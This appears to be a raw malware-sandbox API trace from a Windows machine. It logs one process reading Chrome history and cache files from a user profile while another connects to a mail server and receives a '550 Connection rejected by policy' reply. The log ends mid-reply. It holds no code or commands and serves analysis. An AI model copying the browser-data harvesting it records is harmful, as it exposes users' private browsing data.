FileName => FileHandle => 0x000001b4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@\xe5 T\xe0\x91\xcf\x01\xe0E\x86\xe1\xe7\x91\xcf\x01\x90\xc7\x19\xe1\xe7\x91\xcf\x01\x90\xc7\x19\xe1\xe7\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 \xe3\x82 \xcd\xf7\x98\x00\x00\x00\x00\x00\x00\x00\x10$7\xa4\xe5\x91\xcf\x01\x10$7\xa4\xe5\x91\xcf\x01\x10$7\xa4\xe5\x91\xcf\x01\x10$7\xa4\xe5\x91\xcf\x01\x19b\x03\x00\x00\x00\x00\x00\x00p\x03\x00\x00\x00\x00\x00 \x00\x00\x008\x00\x00\x00\x00\x00\x00\x00\x10\x00C\x00E\x00R\x00T\x00I\x00F\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00e\x00r\x00t\x00i\x00f\x00i\x00c\x00a\x00t\x00e\x00 \x00R\x00e\x00v\x00o\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00L\x00i\x00s\x00t\x00s\x00\xd5\xf5 |
SUCCESS | 0x00000000 | |
| 07:44:04,601 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:04,671 | 364 | connect |
socket => 0x000001a4 |
FAILURE | 4294967295 | |
| 07:44:04,681 | 364 | closesocket |
socket => 0x000001a4 |
SUCCESS | 0x00000000 | |
| 07:44:04,681 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\*.* |
SUCCESS | 0x00169d88 | |
| 07:44:04,701 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0\xc2\x1eT\xe0\x91\xcf\x01\xf0\xfa\xc7\xe1\xe7\x91\xcf\x01\xf0\xfa\xc7\xe1\xe7\x91\xcf\x01\xf0\xfa\xc7\xe1\xe7\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00 \x1d\xbe[\xe0\x91\xcf\x01\x00p\xa9\\xe0\x91\xcf\x01\x00p\xa9\\xe0\x91\xcf\x01\x00p\xa9\\xe0\x91\xcf\x01\x00\xe0\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x00 \x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x10\x00A\x00R\x00C\x00H\x00I\x00V\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00r\x00c\x00h\x00i\x00v\x00e\x00d\x00 \x00H\x00i\x00s\x00t\x00o\x00r\x00y\x00\x00\x00\x90\x00\x00\x00\x00\x00\x00\x00@.\xf8[\xe0\x91\xcf\x01\x80\xa9\xb5\\xe0\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:04,711 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:04,711 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:04,711 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:04,711 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:04,711 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:04,721 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Archived History-journal DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:04,721 | 504 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:04,721 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:44:04,721 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00010000 BaseAddress => 0x00183000 |
SUCCESS | 0x00000000 | |
| 07:44:04,721 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:04,791 | 364 | gethostbyname |
Name => cluster4.us.messagelabs.com |
SUCCESS | 0x001641e0 | |
| 07:44:04,791 | 364 | socket |
type => 1 protocol => 6 af => 2 |
SUCCESS | 0x000001a0 | |
| 07:44:04,821 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:04,821 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001bc FileInformation => h\x00\x00\x00\x00\x00\x00\x00p\xab\x86T\xe0\x91\xcf\x01\xe0p"\x01\xe4\x91\xcf\x01\xe0p"\x01\xe4\x91\xcf\x01\xe0p"\x01\xe4\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00p\x00\x00\x00\x00\x00\x00\x00\xc0C\xc2T\xe0\x91\xcf\x01\x10\xcd\x87\xe1\xe7\x91\xcf\x01\x10\xcd\x87\xe1\xe7\x91\xcf\x01\x10\xcd\x87\xe1\xe7\x91\xcf\x01\x00\xb0\x00\x00\x00\x00\x00\x00\x00\xb0\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00a\x00t\x00a\x00_\x000\x00b\x00s\x00.\x00p\x00\x00\x00\x00\x00\x00\x00\xc0C\xc2T\xe0\x91\xcf\x01\x10\xcd\x87\xe1\xe7\x91\xcf\x01\x10\xcd\x87\xe1\xe7\x91\xcf\x01\x10\xcd\x87\xe1\xe7\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:04,831 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000001 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:04,841 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x00\xed\xbd w#\xb7\xd1(\xfaW\xfaYGg<1\xc9\xe9\x85\xcdE:\xf6\xfbf\xbc;^\xe2%\xb1\x9d\xef\xe5\xfa4\xc9\xa6H\x0f\xc9\xa6\xd9\xe4h4\xba\xfa\xef\x0f\x85\xb5\x00\x14\xba\x9b\x9aI\xbe\xdc{\x12e,\x8a@\x15\xb6B\xa1P\xa8ep\xd3\xaf\xcb\xf9q]\xed\xae\x8a\xe5\xb1<\xdc\xcf7eq\xb8\x9aU\xc7\xd5\xf5\xbc\xda\x1d\xcb\xdd\xf1\xea\xbd\xc1{\xd7\x8bu\xbd\xdf\x14wW\xb3M5\x7fy\xbd*\xd77\xab\xe3U|\xfdj]\xafg\xeb\xcd\xfaxw\xb5Z/\x16\xe5\xeeap\xd3?\xed\xd6\xc7h@#\xdeU\xbb\x92\xa8s\x7f\xbb^\x1cWWI\x1c_^W\xaf\xca\xc3rS\xdd"\x8c\xb2VO\x02\xde\xbf\xa9\xaa\xedU\xc2K\xf6\xac\xf1\x8f\xd4\xf7\x0c\xac8^\x1d\xa0s\xd7\xc7\xf2\xf5\xb1_l\xd67;\xf1\x85U{\xb9>\xd4\xaa\xfa\xa6\Z\xb5\xe1o\xa8|\xdco\xfa\xc9(\x8e$\xf2\x1e\xeauC\xd1\x19U FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:04,942 | 364 | connect |
socket => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:04,992 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:05,002 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000002 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,002 | 504 | NtReadFile |
Buffer => \x89PNG
\x1a
\x00\x00\x00
IHDR\x00\x00\x03\xa0\x00\x00\x00\xec\x08\x02\x00\x00\x00\xe5\xd5\l\x00\x00_\x93IDATx\xda\xed\xbdit\x1c\xd7u\xef\xab\xcf\xf7\xdb\xfb\xe0\x9b\xb7V\x96\xd7J\xbc\xae\xdf{YI<<[/\xcb\xb1\xf3\xfc\x12[\xcb\xc9}\x8e\xed\xc8\x19\xeck)7\x9e"+\x8e-Y\xb6,\xc94%\xca\xf6\x93dY\x93EY\xe2<[\x9cG\x803\x01\x82\x048ah4\xd0h\x0c\x8d\xb1\xe7Fc \x06\x02 EIx\xbb\xeaT\xed\xdau\xaa\xaa\xbb1\x90D\x83\xff\x1f\x9b\x8d\xaaS\xe7\xec\xb3k\x9f}N\xfd\xbb\xd1\xe8\xbag\x16\xcc\x85\xf7\x01\x00\x00\x00\x00n;\xd0`s\xe2\x1e\x84\x00B\x16\x00\x00\x00\x00\x10\xbe\x10\xb8P\xb4\x00\x00\x00\x00\x00\xd0\xbb\x10\xb8\xd0\xb2\x00\x00\x00\x00\x00P\xbd\x10\xb8\xd0\xb5\x00\x00\x00\x00\x00P\xba\x10\xb8\xb7P\xda\xbeg\xe3[\x08\x00\x00\x00\x00\xb0@\x8a
\x0f\xc8\\x08\xdc\xd9\x05
Y FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,062 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:05,062 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000004 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,062 | 504 | NtReadFile |
Buffer => wOFF\x00\x01\x00\x00\x00\x00T\xc8\x00\x10\x00\x00\x00\x00\x92\xc0\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00FFTM\x00\x00\x01l\x00\x00\x00\x1c\x00\x00\x00\x1c\\xc42\x11OS/2\x00\x00\x01\x88\x00\x00\x00^\x00\x00\x00`\xa2
\xb8\x14cmap\x00\x00\x01\xe8\x00\x00\x01i\x00\x00\x01\xb2\x8c\xe8\xdc\x99cvt \x00\x00\x03T\x00\x00\x00[\x00\x00\x00\xa6\x10\x91\x1a4fpgm\x00\x00\x03\xb0\x00\x00\x04\x9f\x00\x00\x07\xb4~a\xb6\x11gasp\x00\x00\x08P\x00\x00\x00\x0c\x00\x00\x00\x0c\x00\x08\x00\x1bglyf\x00\x00\x08\\x00\x007r\x00\x00T\xb8\x142b\x00head\x00\x00?\xd0\x00\x00\x003\x00\x00\x006\xf95\x14\xe2hhea\x00\x00@\x04\x00\x00\x00\x1e\x00\x00\x00$\x0e\xb5\x04\xfahmtx\x00\x00@$\x00\x00\x02\x0b\x00\x00\x03X\xb1\xc4P\x8dkern\x00\x00B0\x00\x00\x0bj FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,112 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:05,122 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000005 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,132 | 504 | NtReadFile |
Buffer => wOFF\x00\x01\x00\x00\x00\x00T\xf0\x00\x10\x00\x00\x00\x00\x93\xb8\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00FFTM\x00\x00\x01l\x00\x00\x00\x1c\x00\x00\x00\x1c\\xb9\iOS/2\x00\x00\x01\x88\x00\x00\x00]\x00\x00\x00`\xa0\xd4\xbb\x9fcmap\x00\x00\x01\xe8\x00\x00\x01i\x00\x00\x01\xb2\x8c\xe8\xdc\x99cvt \x00\x00\x03T\x00\x00\x00]\x00\x00\x00\xaa\x12\xeb\x13\xa9fpgm\x00\x00\x03\xb4\x00\x00\x04\x9f\x00\x00\x07\xb4~a\xb6\x11gasp\x00\x00\x08T\x00\x00\x00\x10\x00\x00\x00\x10\x00\x1e\x00#glyf\x00\x00\x08d\x00\x007\x88\x00\x00U\xa0~Q\xcb\head\x00\x00?\xec\x00\x00\x003\x00\x00\x006\xf9q\x14\xc8hhea\x00\x00@ \x00\x00\x00\x1e\x00\x00\x00$\x0e\xf2\x058hmtx\x00\x00@@\x00\x00\x02\x03\x00\x00\x03Xy\xa4[4kern\x00\x00BD\x00\x00\x0bj FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,172 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:05,172 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000006 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,192 | 504 | NtReadFile |
Buffer => wOFF\x00\x01\x00\x00\x00\x00P@\x00\x12\x00\x00\x00\x00\x88\x94\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00GDEF\x00\x00\x01\x94\x00\x00\x00\x1c\x00\x00\x00\x1c\x00\xe6\x01\xa3GPOS\x00\x00\x01\xb0\x00\x00\x00\x0c\x00\x00\x00\x0c\x00\x15\x00
GSUB\x00\x00\x01\xbc\x00\x00\x00\x0c\x00\x00\x00\x0c\x00\x15\x00
OS/2\x00\x00\x01\xc8\x00\x00\x00_\x00\x00\x00`\xa1>\x9e\xc9cmap\x00\x00\x02(\x00\x00\x00\x90\x00\x00\x00\xbc\x8d\xc5\x90\xe5cvt \x00\x00\x02\xb8\x00\x00\x00Y\x00\x00\x00\xa2\x0fM\x18\xa4fpgm\x00\x00\x03\x14\x00\x00\x04\x9f\x00\x00\x07\xb4~a\xb6\x11gasp\x00\x00\x07\xb4\x00\x00\x00\x10\x00\x00\x00\x10\x00\x15\x00#glyf\x00\x00\x07\xc4\x00\x0053\x00\x00P\xd0\xe2\x1b\x9cvhead\x00\x00<\xf8\x00\x00\x006\x00\x00\x006\xfc\x94\xe4\x02hhea\x00\x00=0\x00\x00\x00\x1f FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,232 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:05,232 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000008 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,242 | 504 | NtReadFile |
Buffer => wOFF\x00\x01\x00\x00\x00\x00S\x18\x00\x12\x00\x00\x00\x00\x8e\xe8\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00GDEF\x00\x00\x01\x94\x00\x00\x00\x16\x00\x00\x00\x16\x00\x10\x00\xd6GPOS\x00\x00\x01\xac\x00\x00\x00\x0c\x00\x00\x00\x0c\x00\x15\x00
GSUB\x00\x00\x01\xb8\x00\x00\x00\x0c\x00\x00\x00\x0c\x00\x15\x00
OS/2\x00\x00\x01\xc4\x00\x00\x00`\x00\x00\x00`\xa2u\xa1\x18cmap\x00\x00\x02$\x00\x00\x00\x90\x00\x00\x00\xbc\x8d\xc4\x90\xe3cvt \x00\x00\x02\xb4\x00\x00\x00]\x00\x00\x00\xaa\x13-\x1a\x94fpgm\x00\x00\x03\x14\x00\x00\x04\xa8\x00\x00\x07\xe0\xbbs\xa4ugasp\x00\x00\x07\xbc\x00\x00\x00\x0c\x00\x00\x00\x0c\x00\x08\x00\x1bglyf\x00\x00\x07\xc8\x00\x008\x10\x00\x00V\xd20\xebt\head\x00\x00?\xd8\x00\x00\x006\x00\x00\x006\xfc\xff\xca\xb2hhea\x00\x00@\x10\x00\x00\x00\x1f FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,342 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,342 | 364 | recv |
buffer => 5 socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,342 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,342 | 364 | recv |
buffer => 0 socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,342 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,342 | 364 | recv |
buffer => 1 socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,342 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,342 | 364 | recv |
buffer => socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,342 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,342 | 364 | recv |
buffer => C socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,342 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,352 | 364 | recv |
buffer => o socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,352 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,352 | 364 | recv |
buffer => n socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,352 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,352 | 364 | recv |
buffer => n socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,352 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,352 | 364 | recv |
buffer => e socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,352 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,352 | 364 | recv |
buffer => c socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,352 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,352 | 364 | recv |
buffer => t socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,352 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,352 | 364 | recv |
buffer => i socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,352 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,352 | 364 | recv |
buffer => o socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,352 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,352 | 364 | recv |
buffer => n socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,352 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,352 | 364 | recv |
buffer => socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,362 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,362 | 364 | recv |
buffer => r socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,362 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,362 | 364 | recv |
buffer => e socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,362 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,362 | 364 | recv |
buffer => j socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,362 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,362 | 364 | recv |
buffer => e socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,362 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,362 | 364 | recv |
buffer => c socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,362 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,362 | 364 | recv |
buffer => t socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,362 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,362 | 364 | recv |
buffer => e socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,362 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,362 | 364 | recv |
buffer => d socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,362 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,362 | 364 | recv |
buffer => socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,362 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,372 | 364 | recv |
buffer => b socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,372 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,372 | 364 | recv |
buffer => y socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,372 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,372 | 364 | recv |
buffer => socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,372 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,372 | 364 | recv |
buffer => p socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,372 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,372 | 364 | recv |
buffer => o socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,372 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,372 | 364 | recv |
buffer => l socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,372 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,372 | 364 | recv |
buffer => i socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,372 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,372 | 364 | recv |
buffer => c socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,372 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,372 | 364 | recv |
buffer => y socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,372 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,372 | 364 | recv |
buffer => socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,372 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,372 | 364 | recv |
buffer => [ socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,402 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,402 | 364 | recv |
buffer => 7 socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,402 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,402 | 364 | recv |
buffer => . socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,402 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,402 | 364 | recv |
buffer => 7 socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,402 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,402 | 364 | recv |
buffer => ] socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,402 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,402 | 364 | recv |
buffer => socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,402 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,402 | 364 | recv |
buffer => 8 socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,402 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,402 | 364 | recv |
buffer => 7 socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,402 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,402 | 364 | recv |
buffer => 0 socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,402 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,402 | 364 | recv |
buffer => 7 socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,402 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,402 | 364 | recv |
buffer => , socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,412 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,412 | 364 | recv |
buffer => socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,412 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,412 | 364 | recv |
buffer => p socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,412 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,412 | 364 | recv |
buffer => l socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,412 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,412 | 364 | recv |
buffer => e socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
